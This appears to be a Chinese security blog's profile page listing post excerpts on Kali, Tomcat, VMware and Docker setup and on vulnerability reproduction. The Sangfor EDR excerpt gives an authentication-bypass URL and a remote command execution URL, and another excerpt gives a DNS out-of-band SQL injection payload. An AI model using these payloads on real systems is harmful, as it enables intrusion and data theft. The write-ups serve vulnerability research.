- 博客(16)
- 资源 (5)
- 收藏
- 关注
原创 【漏洞修复】SSL/TLS协议信息泄露漏洞(CVE-2016-2183)
TLS是安全传输层协议,用于在两个通信应用程序之间提供保密性和数据完整性。TLS, SSH, IPSec协商及其他产品中使用的IDEA、DES及Triple DES密码或者3DES及Triple 3DES存在大约四十亿块的生日界,这可使远程攻击者通过Sweet32攻击,获取纯文本数据。
2022-10-20 09:52:15 5949 1
原创 无法连接 MKS: Failed to connect to server xx.xx.xx.xx:903
VMware Workstation 16.1共享虚拟机远程连接配置方法@Time : 2021/12/9 14:36@Author : 852782749@qq.com开始编辑~VMware Workstation 一直是可以共享虚拟机让远程的客户端通过ip地址进行访问的,VMware Workstation 16.1显示共享虚拟机(已弃用),但是可以临时开启开启共享虚拟机方法如下菜单栏-编辑-首选项-启用共享;注意:需要配置好共享虚拟机位置(自行设置即可);https端口(
2021-12-09 15:23:21 3162 2
原创 使用BurpSuite爬取商品信息
使用BurpSuite爬去商品信息@Time : 2021/5/19 上午9:36@Author :开始编辑~打开BurpSuite后,抓取商品信息url./index.php?r=default/photo/content&id=通过修改id的值,可以遍历所有商品使用burpsuite将抓取到的商品详情数据包发送至【intruder】模块使用【intruder】模块中【Postitions】功能的【Clear】按钮,清除用不到的变量,并将id的值设置成变量切换到【Payl
2021-05-19 10:02:33 569 2
原创 启用不安全的HTTP方法-正确修复方法-apache
apache、http——启用不安全的http方法修复方案@Time : 2021/5/17 下午5:04@Author :开始编辑~说明apache默认安装之后,会开启多个http方法,网络上有好多个修复方式是通过过滤的形式进行限制,但是治标不治本如果只使用过滤http方法进行限制会出现下列问题使用过滤限制http请求方法的步骤在httpd.conf配置文件中取消mod_rewrite.so模块的注释#LoadModule rewrite_module modules/mod_r
2021-05-17 18:03:14 3258
原创 kali2019之后版本shell脚本自启动
kali2019之后版本脚本自启动@Time : 2020年12月2日, 0002 14:08@Author : 862897316@qq.com@Software: PyCharm开始编写脚本自启动印象中,kali系统中是存在rc.local文件的,但是使用虚拟机安装的系统里面,并没有找到rc.loacl文件因此设置脚本自启动方式就遇到了阻碍编辑shell脚本并添加执行权限#!/bin/bashcd /root/Desktop/nohup python MyServer.py
2020-12-02 14:42:32 1493
原创 kali2019之后版本自动登录
kali2019之后版本自动登录切换到配置目录cd /etc/lightdm修改配置文件vim lightdm.conf在配置文件中找到[Seat:*位置去掉注释并修改autologin-user参数的值为需要自动登陆的账户如autologin-user=root输入:wq保存退出修改启动调用文件~/.dmrcvim ~/.dmrc添加下列内容后,保存退出[Seat:*]autologin-user=rootautologin-session=session重启系统测
2020-11-20 09:02:49 802 1
原创 通达OA11.5漏洞复现_2020HW_0day
通达OA11.5漏洞复现_2020HW_0day原文链接1.SQL注入1在【日程管理】->【查询日程】位置POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1Host: 192.168.184.139User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: */*Ac
2020-08-24 17:39:48 1427 2
原创 深信服EDR终端检测响应平台漏洞_2020HW
深信服edr 2020HW 0day远程命令执行漏洞远程代码执行漏洞任意用户登陆漏洞免密码登陆 Payload使用浏览器访问https://ip:prot/ui/login.php?user=任意字符原文链接远程命令执行使用浏览器访问https://ip:prot/tool/log/c.php?strip_slashes=system&host=whoamihttps://ip:prot/tool/log/c.php?strip_slashes=system&ho
2020-08-21 16:54:08 1387
原创 tomcat (CVE-2020-1938)漏洞复现
@TOCTomcat文件包含漏洞(CVE-2020-1938)开始编写环境搭建https://blog.csdn.net/BoZhihouci/article/details/107832298安装步骤受影响版本Apache Tomcat = 67 <= Apache Tomcat <7.0.1008 <= Apache Tomcat <8.5.519 <= Apache Tomcat <9.0.31本次使用版本Tomcat 7.0.69
2020-08-17 17:14:37 876
原创 Tomcat安装及配置开机自启、普通用户权限启动-windows
注意:请在查看本文时,已经完成jdk的安装,本文使用的jdk是1.8.0_251;使用的tomcat为7.0.69本文共2034个字tomcat 下载地址 根据需求下载对应版本即可https://archive.apache.org/dist/tomcat/配置JAVA_HOMEJAVA_HOME C:\Java\jdk1.8.0_251配置 CATALINA_HOME这台电脑->属性->高级配置->环境变量用户变量CATALINA_HOMEC:\apache-.
2020-08-06 10:03:48 2081
原创 CentOS 7使用yum安装docker-compose时提示没有这个包
CentOS 7安装docker-compose使用yum安装docker-compose时提示没有这个包可以使用两个命令安装第一个更新yum源sudo yum -y install epel-release然后安装pipsudo yum -y install python-pip使用pip安装docker-compose第二个更新yum源sudo yum -y install epel-release然后可以直接安装yum install docker-compose可以理
2020-07-13 09:17:43 4255
原创 使用python配合django搭建网站
环境 python3.8Django3.0.2Centos6写在前面的话,不要直接按照书写的内容顺序来安装,先通读下全文,再继续安装,查看环境安装python3.8安装组件sudo yum install yum-utils下载python3.8.1源码wget https://www.python.org/ftp/python/3.8.1/Pytho...
2020-02-14 17:11:58 430
原创 Out of Band SQL盲注
SQL盲注使用http://ceye.io/DNSlog获取dns记录获取自己的Identifierxxxxxx.ceye.io搭建环境Windows server 2003 +phpstudy+sqli-labsPayload: and%20load_file(concat(%27\\\\%27,(select database()),%27.xxxxxx.c...
2020-02-14 17:05:03 1651
原创 python 2.7.x 在windows10终端中提示LookupError: unknown encoding: cp65001
在终端使用python时,发现没有办法正常操作,会提示LookupError: unknown encoding: cp65001在度娘哪里找了好多方法得不到解决,像修改注册表HKEY_CURRENT_USER\Console中CodePage的键值,提示修改成936就行了,我的本来就是936。(如果不是的可以修改试试)继续向下看,又找到可以通过在终端执行 chcp 936
2017-11-09 08:50:01 3175
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人